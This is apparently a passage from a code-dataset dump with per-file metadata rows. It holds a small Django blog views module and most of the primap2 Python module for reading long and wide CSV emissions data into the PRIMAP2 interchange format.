api.add_resource(FastaiApi, '/api/fastai') | 35.555556 | 60 | 0.745313 | 79 | 640 | 5.924051 | 0.329114 | 0.102564 | 0.239316 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121875 | 640 | 18 | 61 | 35.555556 | 0.83274 | 0.110938 | 0 | 0 | 0 | 0 | 0.186949 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
20456537a5c6aea960473d2a9276610b6f2f1cc1 | 1,416 | py | Python | blogging/views.py | greeneyedsoandso/django | 7b4c5c9ec75cdc34de0fdaf6c3c705539cea0dfc | [
"Unlicense"
] | null | null | null | blogging/views.py | greeneyedsoandso/django | 7b4c5c9ec75cdc34de0fdaf6c3c705539cea0dfc | [
"Unlicense"
] | 2 | 2020-11-22T22:34:56.000Z | 2020-11-25T03:59:30.000Z | blogging/views.py | greeneyedsoandso/django | 7b4c5c9ec75cdc34de0fdaf6c3c705539cea0dfc | [
"Unlicense"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.template import loader
from blogging.models import Post
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.shortcuts import redirect
from django import forms
from django.utils import timezone
from blogging.forms import MyCommentForm
from blogging.models import Comment
from django.views.generic.edit import CreateView
class PostListView(ListView):
template_name = "blogging/list.html"
queryset = Post.objects.exclude(published_date__exact=None).order_by(
"-published_date"
)
class PostDetailView(DetailView):
model = Post
template_name = "blogging/detail.html"
queryset = Post.objects.exclude(published_date__exact=None)
class CommentCreateView(CreateView):
model = Comment
template_name = "blogging/add.html"
fields = []
def add_model(self, request):
if request.method == "POST":
form = MyCommentForm(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
return redirect("/")
else:
form = MyCommentForm()
return render(request, "blogging/add.html", {"object": form})
| 28.897959 | 73 | 0.704096 | 160 | 1,416 | 6.13125 | 0.39375 | 0.091743 | 0.045872 | 0.067278 | 0.106014 | 0.106014 | 0.106014 | 0.106014 | 0.106014 | 0 | 0 | 0.002688 | 0.211864 | 1,416 | 48 | 74 | 29.5 | 0.876344 | 0 | 0 | 0 | 0 | 0 | 0.069209 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.333333 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
204adb67c86260fa9da2f822cd26c121d399b5b3 | 52,013 | py | Python | primap2/pm2io/_data_reading.py | mikapfl/primap2 | a2f15cae9f7e3fabdc5d109f5e33e144de0faf97 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-05-17T17:38:37.000Z | 2021-05-17T17:38:37.000Z | primap2/pm2io/_data_reading.py | mikapfl/primap2 | a2f15cae9f7e3fabdc5d109f5e33e144de0faf97 | [
"ECL-2.0",
"Apache-2.0"
] | 84 | 2021-02-10T14:30:20.000Z | 2022-03-23T13:24:50.000Z | primap2/pm2io/_data_reading.py | mikapfl/primap2 | a2f15cae9f7e3fabdc5d109f5e33e144de0faf97 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-02-10T10:22:41.000Z | 2021-02-10T14:22:08.000Z | import datetime
import itertools
from pathlib import Path
from typing import (
IO,
Any,
Callable,
Dict,
Hashable,
Iterable,
List,
Optional,
Set,
Union,
)
import numpy as np
import pandas as pd
from loguru import logger
from .. import _alias_selection
from .._units import ureg
from . import _conversion
from ._interchange_format import (
INTERCHANGE_FORMAT_COLUMN_ORDER,
INTERCHANGE_FORMAT_MANDATORY_COLUMNS,
INTERCHANGE_FORMAT_OPTIONAL_COLUMNS,
)
SEC_CATS_PREFIX = "sec_cats__"
NA_VALUES = [
"nan",
"NE",
"-",
"NA, NE",
"NO,NE",
"NA,NE",
"NE,NO",
"NE0",
"NO, NE",
]
def convert_long_dataframe_if(
data_long: pd.DataFrame,
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y-%m-%d",
) -> pd.DataFrame:
"""convert a DataFrame in long (tidy) format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
Parameters
----------
data_long: str, pd.DataFrame
Long format DataFrame file which will be converted.
coords_cols : dict
Dict where the keys are column names in the files to be read and the value is
the dimension in PRIMAP2. To specify the data column containing the observable,
use the "data" key. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the dataframe to be
converted and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. For the "category", "entity", and "unit" columns,
the rule "PRIMAP1" is available, which translates from PRIMAP1 metadata to
PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Vales are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filing function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to format the time information for the data columns
in the interchange format.
Default: "%F", i.e. the ISO 8601 date format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
if add_coords_cols is None:
add_coords_cols = {}
if meta_data is None:
attrs = {}
else:
attrs = meta_data.copy()
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
filter_data(data_long, filter_keep, filter_remove)
add_dimensions_from_defaults(
data_long, coords_defaults, additional_allowed_coords=["time"]
)
naming_attrs = rename_columns(
data_long, coords_cols, add_coords_cols, coords_defaults, coords_terminologies
)
attrs.update(naming_attrs)
additional_coordinates = additional_coordinate_metadata(
add_coords_cols, coords_cols, coords_terminologies
)
if coords_value_mapping is not None:
map_metadata(data_long, attrs=attrs, meta_mapping=coords_value_mapping)
if coords_value_filling is not None:
data_long = fill_from_other_col(
data_long, attrs=attrs, coords_value_filling=coords_value_filling
)
coords = list(set(data_long.columns.values) - {"data"})
harmonize_units(data_long, dimensions=coords, attrs=attrs)
data_long["time"] = pd.to_datetime(data_long["time"], format=time_format)
data, coords = long_to_wide(data_long, time_format=time_format)
data, coords = sort_columns_and_rows(data, dimensions=coords)
dims = coords.copy()
for add_coord in add_coords_cols.keys():
dims.remove(add_coord)
data.attrs = interchange_format_attrs_dict(
xr_attrs=attrs,
time_format=time_format,
dimensions=dims,
additional_coordinates=additional_coordinates,
)
return data
def read_long_csv_file_if(
filepath_or_buffer: Union[str, Path, IO],
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y-%m-%d",
) -> pd.DataFrame:
"""Read a CSV file in long (tidy) format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
Parameters
----------
filepath_or_buffer: str, pathlib.Path, or file-like
Long CSV file which will be read.
coords_cols : dict
Dict where the keys are column names in the files to be read and the value is
the dimension in PRIMAP2. To specify the data column containing the observable,
use the "data" key. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the csv file to be
read and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. For the "category", "entity", and "unit" columns,
the rule "PRIMAP1" is available, which translates from PRIMAP1 metadata to
PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Vales are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filing function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to format the time information for the data columns
in the interchange format.
Default: "%F", i.e. the ISO 8601 date format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
data_long = read_long_csv(filepath_or_buffer, coords_cols, add_coords_cols)
return convert_long_dataframe_if(
data_long=data_long,
coords_cols=coords_cols,
add_coords_cols=add_coords_cols,
coords_defaults=coords_defaults,
coords_terminologies=coords_terminologies,
coords_value_mapping=coords_value_mapping,
coords_value_filling=coords_value_filling,
filter_keep=filter_keep,
filter_remove=filter_remove,
meta_data=meta_data,
time_format=time_format,
)
def long_to_wide(
data_long: pd.DataFrame, *, time_format: str
) -> (pd.DataFrame, Set[str]):
data_long["time"] = data_long["time"].dt.strftime(time_format)
coords = list(set(data_long.columns.values) - {"data", "time"})
# unit is neither a coordinate nor a data column, so has to be handled separately
unit = data_long[coords].drop_duplicates()
coords.remove("unit")
unit.index = pd.MultiIndex.from_frame(unit[coords])
series = data_long["data"]
series.index = pd.MultiIndex.from_frame(data_long[coords + ["time"]])
data = series.unstack("time")
data["unit"] = unit["unit"]
data.reset_index(inplace=True)
data.columns.name = None
return data, coords + ["unit"]
def convert_wide_dataframe_if(
data_wide: pd.DataFrame,
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y",
time_cols: Optional[List] = None,
) -> pd.DataFrame:
"""
Convert a DataFrame in wide format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
TODO: Currently duplicate data points will not be detected.
TODO: enable filtering through query strings
TODO: enable specification of the entity terminology
Parameters
----------
data_wide: pd.DataFrame
Wide DataFrame which will be converted.
coords_cols : dict
Dict where the keys are PRIMAP2 dimension names and the values are column
names in the dataframe to be converted.
For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the dataframe to be
converted and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the dataframe.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. The only defined rule at the moment is "PRIMAP1"
which can be used for the "category", "entity", and "unit" columns to translate
from PRIMAP1 metadata to PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Vales are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filing function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str
str with strftime style format used to parse the time information for
the data columns.
Default: "%Y", which will match years.
time_cols : list, optional
List of column names which contain the data for each time point. If not given
cols will be inferred using time_format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
if add_coords_cols is None:
add_coords_cols = {}
if meta_data is None:
attrs = {}
else:
attrs = meta_data.copy()
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
# get all the columns that are actual data not metadata (usually the years)
if time_cols is None:
time_columns = [
col
for col in data_wide.columns.values
if matches_time_format(col, time_format)
]
else:
time_columns = time_cols
# make a copy of the data to not alter the input data
data_if = data_wide.copy()
filter_data(data_if, filter_keep, filter_remove)
add_dimensions_from_defaults(data_if, coords_defaults)
naming_attrs = rename_columns(
data_if, coords_cols, add_coords_cols, coords_defaults, coords_terminologies
)
attrs.update(naming_attrs)
additional_coordinates = additional_coordinate_metadata(
add_coords_cols, coords_cols, coords_terminologies
)
if coords_value_mapping is not None:
map_metadata(data_if, attrs=attrs, meta_mapping=coords_value_mapping)
if coords_value_filling is not None:
data_if = fill_from_other_col(
data_if, attrs=attrs, coords_value_filling=coords_value_filling
)
coords = list(set(data_if.columns.values) - set(time_columns))
harmonize_units(data_if, dimensions=coords, attrs=attrs)
data_if, coords = sort_columns_and_rows(data_if, dimensions=coords)
dims = coords.copy()
for add_coord in add_coords_cols.keys():
dims.remove(add_coord)
data_if.attrs = interchange_format_attrs_dict(
xr_attrs=attrs,
time_format=time_format,
dimensions=dims,
additional_coordinates=additional_coordinates,
)
return data_if
def read_wide_csv_file_if(
filepath_or_buffer: Union[str, Path, IO],
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y",
) -> pd.DataFrame:
"""Read a CSV file in wide format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
TODO: Currently duplicate data points will not be detected.
TODO: enable filtering through query strings
TODO: enable specification of the entity terminology
Parameters
----------
filepath_or_buffer: str, pathlib.Path, or file-like
Wide CSV file which will be read.
coords_cols : dict
Dict where the keys are PRIMAP2 dimensions and the values are column names in
the files to be read. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the csv file to be
read and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. The only defined rule at the moment is "PRIMAP1"
which can be used for the "category", "entity", and "unit" columns to translate
from PRIMAP1 metadata to PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Vales are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filing function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to parse the time information for the data columns.
Default: "%Y", which will match years.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
data, time_columns = read_wide_csv(
filepath_or_buffer,
coords_cols,
add_coords_cols=add_coords_cols,
time_format=time_format,
)
data = convert_wide_dataframe_if(
data,
coords_cols=coords_cols,
add_coords_cols=add_coords_cols,
coords_defaults=coords_defaults,
coords_terminologies=coords_terminologies,
coords_value_mapping=coords_value_mapping,
coords_value_filling=coords_value_filling,
filter_keep=filter_keep,
filter_remove=filter_remove,
meta_data=meta_data,
time_format=time_format,
time_cols=time_columns,
)
return data
def interchange_format_attrs_dict(
*, xr_attrs: dict, time_format: str, dimensions, additional_coordinates: dict = None
) -> dict:
metadata = {
"attrs": xr_attrs,
"time_format": time_format,
"dimensions": {"*": dimensions.copy()},
}
if additional_coordinates:
metadata["additional_coordinates"] = additional_coordinates
return metadata
def additional_coordinate_metadata(
add_coords_cols: Dict[str, List[str]],
coords_cols: Dict[str, str],
coords_terminologies: Dict[str, str],
) -> dict:
"""Create the `additional_coordinates` dict and do a few consistency checks"""
additional_coordinates = {}
for coord in add_coords_cols:
if coord in coords_terminologies:
logger.error(
f"Additional coordinate {coord} has terminology definition. "
f"This is currently not supported by PRIMAP2."
)
raise ValueError(
f"Additional coordinate {coord} has terminology definition. "
f"This is currently not supported by PRIMAP2."
)
if add_coords_cols[coord][1] not in coords_cols:
logger.error(
f"Additional coordinate {coord} refers to unknown coordinate "
f"{add_coords_cols[coord][1]}. "
)
raise ValueError(
f"Additional coordinate {coord} refers to unknown coordinate "
f"{add_coords_cols[coord][1]}. "
)
if add_coords_cols[coord][1] in coords_terminologies:
additional_coordinates[coord] = (
f"{add_coords_cols[coord][1]} "
f"({coords_terminologies[add_coords_cols[coord][1]]})"
)
else:
additional_coordinates[coord] = add_coords_cols[coord][1]
return additional_coordinates
def check_mandatory_dimensions(
coords_cols: Dict[str, str],
coords_defaults: Dict[str, Any],
):
"""Check if all mandatory dimensions are specified."""
for coord in INTERCHANGE_FORMAT_MANDATORY_COLUMNS:
if coord not in coords_cols and coord not in coords_defaults:
logger.error(
f"Mandatory dimension {coord!r} not found in coords_cols={coords_cols}"
f" or coords_defaults={coords_defaults}."
)
raise ValueError(f"Mandatory dimension {coord!r} not defined.")
def check_overlapping_specifications(
coords_cols: Dict[str, str],
coords_defaults: Dict[str, Any],
):
both = set(coords_cols.keys()).intersection(set(coords_defaults.keys()))
if both:
logger.error(
f"{both!r} is given in coords_cols and coords_defaults, but"
f" it must only be given in one of them."
)
raise ValueError(f"{both!r} given in coords_cols and coords_defaults.")
def check_overlapping_specifications_add_cols(
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, Any],
):
cols_add = [val[0] for val in add_coords_cols.values()]
both = set(coords_cols.values()).intersection(set(cols_add))
if both:
logger.error(
f"columns {both!r} used for dimensions and additional coordinates, but"
f" should be used in only one of them."
)
raise ValueError(f"{both!r} given in coords_cols and add_coords_cols.")
def matches_time_format(value: str, time_format: str):
try:
datetime.datetime.strptime(value, time_format)
return True
except ValueError:
return False
def read_wide_csv(
filepath_or_buffer,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
time_format: str = "%Y",
) -> (pd.DataFrame, List[str]):
data = pd.read_csv(filepath_or_buffer, na_values=NA_VALUES)
# get all the columns that are actual data not metadata (usually the years)
time_cols = [
col for col in data.columns.values if matches_time_format(col, time_format)
]
# remove all non-numeric values from year columns
# (what is left after mapping to nan when reading data)
for col in time_cols:
data[col] = data[col][
pd.to_numeric(data[col], errors="coerce").notnull()
].astype(float)
# remove all cols not in the specification
columns = data.columns.values
if add_coords_cols:
add_coords_col_names = {value[0] for value in add_coords_cols.values()}
else:
add_coords_col_names = set()
data.drop(
columns=list(
set(columns)
- set(coords_cols.values())
- add_coords_col_names
- set(time_cols)
),
inplace=True,
)
# check that all cols in the specification could be read
missing = set(coords_cols.values()) - set(data.columns.values)
if missing:
logger.error(
f"Column(s) {missing} specified in coords_cols, but not found in "
f"the CSV file {filepath_or_buffer!r}."
)
raise ValueError(f"Columns {missing} not found in CSV.")
return data, time_cols
def read_long_csv(
filepath_or_buffer,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
) -> (pd.DataFrame, List[str]):
try:
csv_data_column = coords_cols["data"]
except KeyError:
raise ValueError(
